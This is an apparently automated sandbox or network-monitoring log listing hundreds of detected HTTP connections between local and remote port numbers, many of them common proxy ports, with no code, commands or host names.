                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 26315
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 9401
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 5775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 8090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 26353
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 17145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 55198
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 10003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 14282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 24279
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 50062
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 1431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 13477
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 59268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 1337
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 49999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 30000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50271 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50396 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50300 -> 44195
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50387 -> 6001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50393 -> 19599
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 65000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50330 -> 9123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 49478
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50426 -> 24543
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50381 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 7302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50355 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 25491
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50438 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50207
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 50180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50468 -> 3335
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 9990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50373 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50414 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50353 -> 31247
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50471 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50030
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50421 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 31908
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50519 -> 5123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50271
                  Source: unknownNetwork traffic detected: HTTP traffic on port 30000 -> 50203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 45876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 26976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 55198
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 24397
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50554 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50261
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50403
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 5529
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50507 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 24543 -> 50426
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 54240
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50546 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44195 -> 50300
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50603 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50330
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50533 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50355
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 9764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50602 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50674 -> 31571
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 29197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 5005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50704 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50503
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 8079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50701 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50628 -> 1111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 38117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 8088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50609 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50575
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50752 -> 36779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 13087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50473
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 39323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 28695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50772 -> 23685
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50683 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50421
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50721 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 10003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50710 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 17639
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 59243
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50830 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 7117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50789 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50793 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 12446
                  Source: unknownNetwork traffic detected: HTTP traffic on port 24397 -> 50540
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 24834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50488
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1111 -> 50628
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 50713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50546
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50609
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 50492
                  Source: unknownNetwork traffic detected: HTTP traffic on port 82 -> 50286
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 37847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7117 -> 50775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 64120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 53777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5529 -> 50566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 8079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50533 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50576 -> 56225
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50743 -> 17639
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50679 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50845 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 6014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 26693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 28723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 55636
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50852 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50894 -> 10049
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50855 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50851 -> 27391
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 40975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50922 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50449 -> 14282
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 20317
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50958 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 3129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 84
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 31679
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 20001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50939 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50923 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50969 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50412 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 58703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50409 -> 41746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51082 -> 61634
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 7302
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51049 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50357 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51063 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51058 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 83
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51097 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 63951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51018 -> 58842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51154 -> 15410
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51147 -> 54917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51096 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 10513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51089 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51078 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50582 -> 19802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51084 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51099 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 5935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 64081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 58386
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51158 -> 29985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51217 -> 30717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 29813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 18936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 55109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50635 -> 25675
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 31147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51255 -> 2512
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51332 -> 40179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 29718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50625 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 15303
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51267 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50534 -> 21802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 26087
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51239 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50563 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 53012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51334 -> 19925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50641 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 36181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50673 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51226
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51279 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51367 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 12792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51340 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50711 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51421 -> 12217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51372 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 31147 -> 51323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51354 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51352 -> 5430
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58703 -> 51036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51301
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51427 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 51058
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51097
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51370 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51374 -> 9090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50513 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 10010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51481 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51487 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 7891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50829 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51428 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51490 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50584
